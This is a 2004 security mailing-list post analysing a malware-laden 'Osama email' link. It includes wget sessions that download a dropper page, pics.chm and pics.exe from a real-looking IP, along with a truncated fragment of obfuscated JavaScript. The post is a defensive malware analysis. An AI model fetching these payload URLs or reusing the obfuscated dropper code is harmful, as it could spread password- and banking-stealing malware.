[Dshield] Osama email

Blanchard, Joe BLANCHAJ at bsci.com
Fri Apr 23 18:05:26 GMT 2004


Not sure this is the same as noted in this article.
I'm seeing the following when hitting that link:

The HTML off of /pics attempts to DL pics.chm, which in turn (I believe)
DLs and runs pics.exe.
Oddly, while I've not had enough time to fully investigate this, it overwrites
my wmplayer.exe, resulting in a change in size to 11k from 72k.
Variant maybe?

Cheers
-Joe

Following are wgets of the item(s):
[root@ jgb]# wget http://220.95.231.54/pics
--13:59:16--  http://220.95.231.54/pics
           => `pics'
Connecting to 220.95.231.54:80... connected.
HTTP request sent, awaiting response... 302 Object Moved
Location: http://220.95.231.54/pics/ [following]
--13:59:17--  http://220.95.231.54/pics/
           => `index.html'
Connecting to 220.95.231.54:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4,113 [text/html]

100%[====================================>] 4,113         17.54K/s    ETA 00:00

13:59:17 (17.54 KB/s) - `index.html' saved [4113/4113]

[root@ jgb]# more index.html
<script>
<!--
function S(){var s=location.href.substr(7);return s.substr(0,s.indexOf('/'));}
function T(){return 'l';}
function U(){return 'C';}
function V(){return 'm';}
function W(){return '.';}
function X(){return 'E';}
function Y(){return 'i';}
function Z(){return 'x';}
document.write(unescape("%3"+U()+"HTML%3"+X()+"%3"+U()+"H"+X()+"AD%3"+X()+"%3"+U()+"TITL"+X()+"%3"+X()+"where%20to%20buy%20v"+Y()+"agra%3"+U()+"/TITL"+X()+"%3"+
========== intentionally left out full source
[root@ jgb]# wget http://220.95.231.54/pics.chm
--14:00:56--  http://220.95.231.54/pics.chm
           => `pics.chm'
Connecting to 220.95.231.54:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 11,268 [application/octet-stream]

100%[====================================>] 11,268        23.72K/s    ETA 00:00

14:00:57 (23.72 KB/s) - `pics.chm' saved [11268/11268]
[root@ jgb]# wget http://220.95.231.54/pics.exe
--14:03:11--  http://220.95.231.54/pics.exe
           => `pics.exe'
Connecting to 220.95.231.54:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 10,752 [application/octet-stream]

100%[====================================>] 10,752        21.65K/s    ETA 00:00

14:03:12 (21.65 KB/s) - `pics.exe' saved [10752/10752]




> ----------
> From:
> list-bounces at lists.dshield.org[SMTP:list-bounces at lists.dshield.org] on
> behalf of Deb Hale[SMTP:haled at pionet.net]
> Sent: 	Friday, April 23, 2004 12:40 PM
> To: 	'General DShield Discussion List'
> Subject: 	[Dshield] Osama email
> 
> FYI,
>  
> I just received notification from my AV that the file that Bjorn Stromberg
> emailed had the Exploit-MhtRedir.gen virus. It appears that is what they
> are calling this particular email. Symantec calls it Backdoor.Nibu.D and says
> that it attempts to steal passwords and bank account information.
> http://securityresponse.symantec.com/avcenter/venc/data/backdoor.nibu.d.html
>  
> Deb
>  
> 